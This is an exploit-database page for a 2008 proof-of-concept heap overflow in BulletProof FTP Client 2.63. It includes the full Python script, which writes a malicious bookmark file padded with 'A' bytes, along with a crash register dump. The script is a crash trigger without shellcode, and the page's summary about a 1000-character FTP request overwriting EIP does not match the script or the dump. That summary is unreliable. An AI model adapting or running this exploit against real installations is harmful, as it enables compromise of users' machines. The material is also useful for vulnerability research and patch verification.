header-logo
Suggest Exploit
vendor:
BulletProof FTP Client
by:
His0k4
7.8
CVSS
HIGH
Heap Overflow
119
CWE
Product Name: BulletProof FTP Client
Affected Version From: 2.63 (Build 56)
Affected Version To: 2.63 (Build 56)
Patch Exists: YES
Related CWE: N/A
CPE: a:bpftp:bulletproof_ftp_client
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

BulletProof FTP Client Local Heap Overflow (PoC)

A local heap overflow vulnerability exists in BulletProof FTP Client v2.63 (Build 56). An attacker can exploit this vulnerability by sending a specially crafted FTP request containing 1000 'A' characters. This will cause a heap overflow and overwrite the EIP register, allowing the attacker to execute arbitrary code.

Mitigation:

Upgrade to the latest version of BulletProof FTP Client.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
#                   
#                  ------  |      ______ _____   (--, __*__  ______
#                  |____|  |      |    | |       | ! )  |    |     |
#                [ |    |` |      | <> | |-----> |__/   |    |     | ]
#                  | .. |  |____! |____| |____   |\     |    |-----|
#                                      |        _| \  -----  | ::: |
#                                      |         |  \
#                                |_____|         |   \
#                                                |
#                                                |
#                                               ,|.
#                                              / | \
#                                             |  |  |
#                                             |  _  |
#                                           `._\/.\/_,'
#                                             _( 8 )_
#                                            / '_ _' \
#                                           |  /{_}\  |
#                                           ` |  "  | `
#                                             |     |
#
#
# [+] Application :		BulletProof FTP (Client)  V2.63
#
# [+] Vendor URL :		http://www.bpftp.com/
#
# [+] Bug :			BulletProof FTP Client Local Heap Overflow (PoC)
#
# [+] Author :			His0k4
#
# [+] Greetings :		All friends & Muslims Hackers (dz)
#---------------------------------------------------------------------------------
# EAX 41414141
# ECX 016EC370
# EDX 00000000
# EBX 41414141
# ESP 0012F548
# EBP 0012F5C4 ASCII "AAAAAAAAAAAA"
# ESI 0170E70A ASCII "]AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
# EDI 0170E90A ASCII 03,"ftp"
# EIP 00596423 bpftpcli.00596423
#---------------------------------------------------------------------------------


header1 = "; This file was exported from BulletProof FTP Client vBulletProof FTP Client v2.63 (Build 56)\n"
header2 = "; Sitename=test site\n"
buff = "FTP://user:pass@" + "\x41" * 93


vuln = header1 + header2 + buff

try:
    out_file = open("sites.txt",'w')
    out_file.write(vuln)
    out_file.close()
    raw_input("\nBookmark file created!\n\nNow import the file and run it\n\nPress to exit...")
except:
    print "Error!"
	
# EoF

# milw0rm.com [2008-12-24]